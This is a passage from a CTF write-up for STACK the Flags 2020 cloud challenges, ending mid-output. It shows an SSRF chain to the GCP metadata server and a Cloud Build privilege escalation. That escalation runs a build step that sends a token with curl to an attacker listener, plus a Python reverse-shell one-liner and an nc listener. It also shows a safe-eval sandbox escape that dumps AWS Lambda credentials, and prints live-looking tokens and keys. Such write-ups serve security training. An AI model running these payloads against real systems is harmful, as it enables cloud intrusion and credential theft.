<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at gcp-vm-asia-southeast1.asia-southeast1-a.c.stack-the-flags-296309.internal Port 80</address>
</body></html>
    </body>
</html>

Interestingly, we got a 400 Bad Request error, leaking the internal hostname of an instance hosted on Google Compute Engine (inferred from the gcp-* hostname). If we fix the request by adding a trailing slash to the URL (http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80/), we can use the Internal Web Proxy application to fetch itself:

Internal Web Proxy

Now, we have a working SSRF within the Google VPC network assigned to the GCP Compute Engine instance! :smile:

Can you smell the flag yet? We are so close to the flag now…
Let’s pause for a minute to see where we are at now:
Attack Path Reaching GCP

Metadata FTW

What’s next? Well, we can enumerate the GCP instance metadata server to get temporary service account credentials.

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/
...
HTTP/1.1 200 OK
Metadata-Flavor: Google
Content-Type: application/text
ETag: 2f6048afc5ce2feb
Date: Thu, 10 Dec 2020 06:16:09 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 183
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

attributes/
description
disks/
guest-attributes/
hostname
id
image
licenses/
machine-type
maintenance-event
name
network-interfaces/
preempted
scheduling/
service-accounts/
tags
zone

We see that the deprecated v1beta1 metadata endpoint is still enabled, which is great news for us because, that way, we don’t have to set the Metadata-Flavor: Google HTTP header in our requests. There doesn’t appear to be a way to make the Internal Web Proxy application set a custom HTTP header for us, so we won’t be able to fetch metadata from the v1 metadata endpoint via SSRF:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1/
...
HTTP/1.1 403 Forbidden
Metadata-Flavor: Google
Date: Thu, 10 Dec 2020 06:40:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Metadata Server for VM
Connection: Close
Content-Length: 1636
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
...
$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/
...
covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/
default/
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/aliases
...
default
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/scopes
...
https://www.googleapis.com/auth/cloud-platform
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/token
...
{"access_token":"ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU","expires_in":3395,"token_type":"Bearer"}
...

Here, we can see a service account covid-devops@stack-the-flags-296309.iam.gserviceaccount.com, which corresponds to the covid-devops role. The scope of the service account is cloud-platform, which looks really promising. Lastly, we also managed to fetch the OAuth access token associated with the service account, allowing us to authenticate and perform actions on its behalf.

We will probably also need the project ID, so let’s grab that from the metadata server:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/project/project-id
...

stack-the-flags-296309
...

Enumerating Google Cloud APIs

Looking at the list of Google Cloud APIs, we see that there are many available to us. Note that not all APIs are enabled or accessible by the service account, so we should start by figuring out which ones are accessible to us.
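A side note on authentication: the curl commands below pass the stolen OAuth token as an access_token query parameter; the same calls can equally be made with the token sent in an Authorization: Bearer header. A minimal Node.js sketch of the roles listing performed below (my own illustration, assuming Node 18+ and run as an ES module; the token value is truncated):

// list-roles.mjs - list the project's IAM roles with the stolen token,
// sent as a Bearer token instead of a query parameter.
const token = 'ya29.c.Ko0B...'; // access token from the metadata server (truncated)
const project = 'stack-the-flags-296309';

const res = await fetch(`https://iam.googleapis.com/v1/projects/${project}/roles`, {
  headers: { Authorization: `Bearer ${token}` },
});
console.log(JSON.stringify(await res.json(), null, 2));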

Using GCP’s Identity and Access Management (IAM) API, let’s try to list all roles in the stack-the-flags-296309 project:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "roles": [
    {
      "name": "projects/stack-the-flags-296309/roles/covid_devops",
      "title": "covid-devops",
      "description": "Created on: 2020-11-22",
      "etag": "BwW0oxMMCDU="
    }
  ]
}

That worked! Seems like there’s only the covid_devops role. Let’s try to view the permissions included for the role:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/covid_devops?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "name": "projects/stack-the-flags-296309/roles/covid_devops",
  "title": "covid-devops",
  "description": "Created on: 2020-11-22",
  "includedPermissions": [
    "cloudbuild.builds.create",
    "compute.instances.get",
    "compute.projects.get",
    "iam.roles.get",
    "iam.roles.list",
    "storage.buckets.create",
    "storage.buckets.get",
    "storage.buckets.list",
    "storage.objects.create"
  ],
  "etag": "BwW0oxMMCDU="
}

We observe a few interesting permissions for the covid_devops role. Since we are looking for the flag, perhaps the flag is stored as an object in a GCP Cloud Storage bucket. However, note that we only have the following permissions relating to GCP Cloud Storage:

  • storage.buckets.create
  • storage.buckets.get
  • storage.buckets.list
  • storage.objects.create

Without storage.objects.get permission, we may be unable to read objects stored in the bucket. Nonetheless, let’s proceed on to enumerate the list of buckets using GCP’s Cloud Storage API:

$ curl "https://storage.googleapis.com/storage/v1/b?project=stack-the-flags-296309&access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU"
{
  "kind": "storage#buckets",
  "items": [
    {
      "kind": "storage#bucket",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key",
      "id": "punggol-digital-lock-key",
      "name": "punggol-digital-lock-key",
      "projectNumber": "605021491171",
      "metageneration": "3",
      "location": "ASIA-SOUTHEAST1",
      "storageClass": "STANDARD",
      "etag": "CAM=",
      "defaultEventBasedHold": false,
      "timeCreated": "2020-11-21T20:14:44.705Z",
      "updated": "2020-11-22T07:53:37.521Z",
      "iamConfiguration": {
        "bucketPolicyOnly": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        },
        "uniformBucketLevelAccess": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        }
      },
      "locationType": "region",
      "satisfiesPZS": false
    }
  ]
}

We see that there’s a bucket named punggol-digital-lock-key. Perhaps we need to escalate our privileges to another identity with the storage.objects.get permission. Reviewing the privileges of the covid_devops role, we see that it includes the cloudbuild.builds.create IAM permission.

Road to Impersonating the Cloud Build Service Account

Rhino Security Labs wrote an article on a privilege escalation attack using the cloudbuild.builds.create permission: it allows us to obtain temporary credentials for GCP’s Cloud Build service account, which may have greater privileges than our current covid-devops service account.

Rhino Security Labs also created a public GitHub repository for IAM Privilege Escalation in GCP containing the exploit script for escalating privileges via the cloudbuild.builds.create permission.
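In essence, the exploit queues a Cloud Build build whose single build step runs with the Cloud Build service account’s credentials and exfiltrates the cached token to a listener we control. A rough Node.js sketch of that API call (my own illustration against the Cloud Build REST endpoint, assuming Node 18+ and run as an ES module; the listener address is ours):

// privesc.mjs - queue a Cloud Build build whose only step POSTs the cached
// gsutil token from the build container to our listener.
const token = 'ya29.c.Ko0B...';    // covid-devops access token (truncated)
const project = 'stack-the-flags-296309';
const listener = '3.1.33.7:31337'; // our listening host:port

const build = {
  steps: [{
    name: 'python',
    entrypoint: 'python',
    args: ['-c', `import os;os.system("curl -d @/root/tokencache/gsutil_token_cache ${listener}")`],
  }],
};

const res = await fetch(`https://cloudbuild.googleapis.com/v1/projects/${project}/builds`, {
  method: 'POST',
  headers: { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json' },
  body: JSON.stringify(build),
});
console.log(await res.json()); // build metadata with "status": "QUEUED"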

Before we continue, do install the googleapiclient dependency using:

$ pip3 install google-api-python-client --user

Then, grab the exploit script and run it.
In this example, the listening host is 3.1.33.7 and the listening port is 31337:

$ git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
$ cd GCP-IAM-Privilege-Escalation/ExploitScripts/
$ python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/YTkzZTZmYTMtOWFmOC00YWFjLTg4NTYtNzRlZjlkNGExZGQw",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:13.788132684Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import os;os.system(\"curl -d @/root/tokencache/gsutil_token_cache 3.1.33.7:31337\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0"
        }
    }
}
Web server started at 0.0.0.0:31337.
Waiting for token at 3.1.33.7:31337...

$ 

Strange! The access token for the GCP Cloud Build service account is not returned to us!
Perhaps something went wrong. Let’s modify the script to get a reverse shell and investigate further:

Add this line just before the build_body dict, and use command as the build step’s argument in build_body:

command = f'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.ip_port.split(":")[0]}",{args.ip_port.split(":")[1]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

And, replace these lines:

handler = socketserver.TCPServer(('', int(port)),myHandler)
print(f'Web server started at 0.0.0.0:{port}.')
print(f'Waiting for token at {ip}:{port}...\n')
handler.handle_request()

With these:

print(f'Waiting for reverse shell at {ip}:{port}...\n')
import os; os.system(f"nc -lnvp {port}")

Then, re-run the script:

$ sudo python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/MTEzMjBmN2QtNjMzOS00OTMxLTk5NWMtM2ZiZWRkYTNmYWFl",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "11320f7d-6339-4931-995c-3fbedda3faae",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:14.173481293Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3.1.33.7\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/11320f7d-6339-4931-995c-3fbedda3faae?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/11320f7d-6339-4931-995c-3fbedda3faae"
        }
    }
}
Waiting for reverse shell at 3.1.33.7:31337...

Listening on [0.0.0.0] (family 0, port 31337)
Connection from 34.73.245.117 52068 received!
root@<container-id>:/workspace#

Hooray! We get a root shell! But remember, our goal is not to achieve root on a Cloud Build container, so let’s continue on to get the access token for the Cloud Build service account.

root@<container-id>:/workspace# cat /root/tokencache/gsutil_token_cache
cat /root/tokencache/gsutil_token_cache
cat: /root/tokencache/gsutil_token_cache: No such file or directory

Oh no. The exploit script failed because the access token cached for use by gsutil is missing!

There are two ways to get the access token from this point on:

  1. Method 1: Query the Metadata Server directly
  2. Method 2: Install gsutil and make it fetch the access token for you

Method 1: Via GCP Instance Metadata Server

root@<container-id>:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/?recursive=true
{
    "605021491171@cloudbuild.gserviceaccount.com": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    },
    "default": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    }
}

root@<container-id>:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
{"access_token":"ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY","expires_in":3211,"token_type":"Bearer"}

Method 2: Via gsutil

Using the reverse shell, follow the installation steps for the Google Cloud SDK (which provides gcloud and gsutil) and then run the following command:

root@<container-id>:/workspace# gcloud auth application-default print-access-token
ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY

Getting the Final Flag From Bucket

Awesome! We managed to obtain the temporary access token for the default GCP Cloud Build service account!

Let’s test whether the GCP Cloud Build service account has the storage.objects.list permission by listing the objects in the punggol-digital-lock-key bucket:

$ curl "https://storage.googleapis.com/storage/v1/b/punggol-digital-lock-key/o?project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY"
{
  "kind": "storage#objects",
  "items": [
    {
      "kind": "storage#object",
      "id": "punggol-digital-lock-key/last_half.txt/1607586270019961",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key/o/last_half.txt",
      "mediaLink": "https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media",
      "name": "last_half.txt",
      "bucket": "punggol-digital-lock-key",
      "generation": "1607586270019961",
      "metageneration": "1",
      "contentType": "text/plain",
      "storageClass": "STANDARD",
      "size": "17",
      "md5Hash": "WviwTGRF7YEzWXqehPCbHg==",
      "crc32c": "RtRJWw==",
      "etag": "CPmCyMT1wu0CEAE=",
      "timeCreated": "2020-12-10T07:44:30.019Z",
      "updated": "2020-12-10T07:44:30.019Z",
      "timeStorageClassUpdated": "2020-12-10T07:44:30.019Z"
    }
  ]
}

We finally see the second half of the flag stored as an object in the punggol-digital-lock-key bucket!
Does it also have the storage.objects.get permission?

$ curl "https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media&project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY"
4pPro4ch_Is_G00d}

Yes it does! And there we have it! Combining both pieces of the flag together, we get:

govtech-csg{Mult1_Cl0uD_4pPro4ch_Is_G00d}

Complete Attack Path

Here’s an overview of the complete attack path for this challenge: Overview of Attack Path

Thanks for reading my final write-up on the challenges from STACK the Flags 2020 CTF!

It was fun solving these cloud challenges and gaining a much better understanding of the various services offered by cloud vendors as well as knowing how to perform penetration testing on cloud computing environments.

Here’s a write-up on a cloud challenge titled Hold the Line! Perimeter Defences Doing It's Work!, which I solved in the STACK the Flags 2020 CTF organized by the Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). Unsurprisingly, there were quite a number of solves, since the challenge is rather simple and fairly straightforward.

Those who have analysed the arbitrary JavaScript code injection vulnerability in Bassmaster v1.5.1 (CVE-2014-7205) as part of the Advanced Web Attacks and Exploitation (AWAE) course / Offensive Security Web Expert (OSWE) certification will definitely find the injection vector for this challenge somewhat familiar.

This challenge was written by Tan Kee Hock from GovTech’s CSG :)

Hold the Line! Perimeter Defences Doing It’s Work! Cloud Challenge

Description:
Apparently, the lead engineer left the company (“Safe Online Technologies”). He was a talented engineer and worked on many projects relating to Smart City. He goes by the handle c0v1d-agent-1. Everyone didn’t know what this meant until COViD struck us by surprise. We received a tip-off from his colleagues that he has been using vulnerable code segments in one of a project he was working on! Can you take a look at his latest work and determine the impact of his actions! Let us know if such an application can be exploited!

Tax Rebate Checker - http://lcyw7.tax-rebate-checker.cf/

Introduction

Let’s start by visiting the challenge site.

Tax Rebate Checker

Examining the client-side source code, we can see that the main JavaScript file loaded is http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js, which appears to be webpack-ed. Luckily for us, the source mapping file is also available to us at http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js.map.

You may have heard of Webpack Exploder by @spaceraccoonsec which helps to unpack the source code of the React Webpack-ed application, but are you aware that Google Chrome’s Developer Tools (Chrome DevTools) supports unpacking of Webpack-ed applications out of the box too?

Using Chrome DevTools, we can inspect the original unpacked source files by navigating to the Sources Tab in the top navigation bar, then click on the webpack:// pseudo-protocol in the left sidebar as such:

Analyse Webpack JavaScript Files Using Chrome DevTools

The source code for index.js is shown below:

import React from 'react';
import ReactDOM from 'react-dom';
import axios from 'axios';

class MyForm extends React.Component {
  constructor() {
    super();
    this.state = {
      loading : false,
      message : ''
    };
    this.onInputchange = this.onInputchange.bind(this);
    this.onSubmitForm = this.onSubmitForm.bind(this);
  }

  renderMessage() {
    return this.state.message;
  }

  renderLoading() {
    return 'Please wait...';
  }

  onInputchange(event) {
    this.setState({
      [event.target.name]: event.target.value
    });
  }

  onSubmitForm() {
    let context = this;
    this.setState({
      loading : true,
      message : "Loading..."
    })
    // any changes, please fix at this [https://github.com/c0v1d-agent-1/tax-rebate-checker]
    axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
      age: btoa(this.state.age),
      salary: btoa(this.state.salary)
    })
    .then(function (response) {
      context.setState({
        loading : false,
        message : "You will get (SGD) $" + Math.ceil(response.data.results) + " off your taxes!"
      })
    })
    .catch(function (error) {
      console.log(error);
    });
  }

  render() {
    return (
      <div>
        
        <div>
          <label>
            Annual Salary : <input name="salary" type="number" value={this.state.salary} onChange={this.onInputchange}/>
          </label>
        </div>
        <div>
          <label>
            Age : <input name="age" type="number" value={this.state.age} onChange={this.onInputchange} />
          </label>
        </div>
        <div>
            <button onClick={this.onSubmitForm}>Submit</button>
        </div>
        <br></br>
        <p>{this.state.loading ? this.renderLoading() : this.renderMessage()}</p>
      </div>
    );
  }
}
ReactDOM.render(<MyForm />, document.getElementById('root'));

We can see that there is a comment pointing to a GitHub Repository at https://github.com/c0v1d-agent-1/tax-rebate-checker.
Even if this comment were not provided, we would still be able to find this repository easily by:

  • Searching for c0v1d-agent-1 on GitHub
  • Searching for tax-rebate-checker on GitHub

Tax Rebate Checker GitHub Search

Back to the source code of the React application, we also see the following code:

axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
    age: btoa(this.state.age),
    salary: btoa(this.state.salary)
})

We discover the use of the cors-anywhere proxy, a service which relays requests to the target URL and adds Cross-Origin Resource Sharing (CORS) headers to the response. In other words, the target URL is https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker.

Examining the target URL carefully, we can observe that it is a REST API in Amazon API Gateway. Amazon API Gateway is also often used with AWS Lambda, which is something worth noting before we move on to explore what’s in the GitHub repository.

Analysing GitHub Repository

At https://github.com/c0v1d-agent-1/tax-rebate-checker, we see a Node.js application.
The default README mentions deploying to the AWS Lambda service, which lines up with what we noted earlier.

Let’s look at the source code of the application. The source code of index.js is shown below:

'use strict';
var safeEval = require('safe-eval')
exports.handler = async (event) => {
    let responseBody = {
        results: "Error!"
    };
    let responseCode = 200;
    try {
        if (event.body) {
            let body = JSON.parse(event.body);
            // Secret Formula
            let context = {person: {code: 3.141592653589793238462}};
            let taxRebate = safeEval((new Buffer(body.age, 'base64')).toString('ascii') + " + " + (new Buffer(body.salary, 'base64')).toString('ascii') + " * person.code",context);
            responseBody = {
                    results: taxRebate
            };
        }
    } catch (err) {
        responseCode = 500;
    }
    let response = {
        statusCode: responseCode,
        headers: {
            "x-custom-header" : "tax-rebate-checker"
        },
        body: JSON.stringify(responseBody)
    };
    return response;
};

It looks like our input, supplied as a JSON object containing age and salary, is Base64-decoded and passed to safeEval().

The safe-eval package has a history of vulnerabilities, so let’s also check the package.json file to see which version of safe-eval is being used:

{
  "name": "pension-shecker-lambda",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "safe-eval": "^0.3.0"
  }
}

Indeed, the application uses safe-eval v0.3.0, which is a vulnerable version.

Crafting the Exploit Payload

Let’s examine the proof-of-concept exploit script for CVE-2017-16088 for bypassing the safe-eval sandbox:

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

This returns the process global object, which allows us to control the current Node.js process.
Even though safe-eval prevents the use of require() directly, we can bypass this restriction with process.mainModule.require(), since process.mainModule provides an alternative way to reach the main module (require.main) and its require() function.
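
Here is a minimal local sketch combining the two ideas, assuming safe-eval@0.3.0 is installed in a scratch directory via npm install safe-eval@0.3.0:

var safeEval = require('safe-eval');
// Walk the constructor chain out of the sandbox to reach the host Function
// constructor, obtain the real `process` object, then borrow the main
// module's require() to load child_process and run an OS command.
var payload = "this.constructor.constructor('return process')()" +
    ".mainModule.require('child_process').execSync('id').toString()";
console.log(safeEval(payload));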

Now that we have a good idea of how to perform remote code execution on the AWS Lambda function, let’s also take a closer look at the suspicious GitHub issue at https://github.com/c0v1d-agent-1/tax-rebate-checker/issues/1:

One of the libraries used by the function was vulnerable.
Resolved by attaching a WAF to the prod deployment.
WAF will not to be attached staging deployment there is no real impact.

Recall that the application at http://lcyw7.tax-rebate-checker.cf/ issues requests to https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker, which effectively forwards incoming requests to https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker – the prod stage!

If there’s a WAF on the prod stage, perhaps we can target the unprotected staging deployment first and attempt to bypass the WAF only if need be.

Before we can try to obtain remote code execution on the AWS Lambda function instance, we need to correctly format our input to the server.
As discussed previously, the Tax Rebate Checker application accepts a JSON input with both age and salary Base64-encoded.
Now, let’s use curl to run the AWS Lambda function on the staging deployment to try to obtain the environment variables set in the AWS Lambda function instance:

$ curl -X POST \
    -H 'Content-Type: application/json' \
    https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/staging/tax-rebate-checker \
    --data '{"age":"'$(printf "this.constructor.constructor('return process')().mainModule.require('child_process').execSync('env').toString()" | base64 -w 0)'","salary":"'$(printf 1 | base64)'"}'
{"results":"AWS_LAMBDA_FUNCTION_VERSION=$LATEST\nflag=St4g1nG_EnV_I5_th3_W34k3$t_Link\nAWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjENj//////////wEaDmFwLXNvdXRoZWFzdC0xIkYwRAIgDbiXQPR7pS/1Jlq8+CvWJEvBWEdzDgMZgmKXB6MbNzUCIFTQNbDFdxZ0qdOmTskWzFOeLpH12FinODzQ8XWo7CdNKtEBCHEQABoMNjQyOTk4NDY5NzM2IgzR7/iDouxfR0H3mQkqrgFHKpR/iXFoOCMF3wtocpFugLFNFVy+LMmgO6JFK56vSGq6zGwzepfYZTV7vLvRauJG9Y9e4o10bLznWugZt3RyH4cWvvHURygQsI5x8BRFMHtqNna7Q/lSWUJIancjx07sHZimJzdRO1SJu5PTu9wI2NFCW6uSKq6z/hHf0Ed8uCMAnkOtGHuY7jfoC2tWNPlByvrEW2mQzBFFgj2DTL/GdFSpS351lFD35am7nVQwibHH/gU64QHk9LffR6ZXw66N/7g5BRYhWGdKyz53O04vrFmttDusAhofGi8T74C1/3x096S1NtASZfVj3YmDwMYOQ1j4D6wEp8CUh5vc7FhQr9l9E8Zdvt78jqyx8l4Wto3UMirBgJDtfEqq5TbcaDP9FM9l1dInGC9Ch6YLJHIRl9Lwctj0s8pveOj0FTN29/PhpkHGWzl4SYSHKOAj/7h1k2J8Sx1JdtyDTKu+X6ACp1uxwDK2k2W2bnrCGVQ/3C2dTzoAINtX9RSk8DcBczXM75/cSi+3u+ClT3SMlBVzUmlPsm90G7U=\nAWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/tax-rebate-checker\nLAMBDA_TASK_ROOT=/var/task\nLD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\nAWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\nAWS_LAMBDA_LOG_STREAM_NAME=2020/12/10/[$LATEST]36472aa2e8e049cfad80aec03f1cae7f\nAWS_EXECUTION_ENV=AWS_Lambda_nodejs12.x\nAWS_XRAY_DAEMON_ADDRESS=169.254.79.2:2000\nAWS_LAMBDA_FUNCTION_NAME=tax-rebate-checker\nPATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\nAWS_DEFAULT_REGION=ap-southeast-1\nPWD=/var/task\nAWS_SECRET_ACCESS_KEY=drKOGJQgV4HeWciBrP9CgYyAoJrdoFtTHwg0X//f\nLANG=en_US.UTF-8\nLAMBDA_RUNTIME_DIR=/var/runtime\nAWS_LAMBDA_INITIALIZATION_TYPE=on-demand\nAWS_REGION=ap-southeast-1\nTZ=:UTC\nNODE_PATH=/opt/nodejs/node12/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task\nAWS_ACCESS_KEY_ID=ASIAZLNNSARUIMCNBHX3\nSHLVL=1\n_AWS_XRAY_DAEMON_ADDRESS=169.254.79.2\n_AWS_XRAY_DAEMON_PORT=2000\n_X_AMZN_TRACE_ID=Root=1-5fd1d8f0-7f0800a731b13cf00a3c8db7;Parent=4c8bd2bd54f1fb14;Sampled=0\nAWS_XRAY_CONTEXT_MISSING=LOG_ERROR\n_HANDLER=index.handler\nAWS_LAMBDA_FUNCTION_MEMO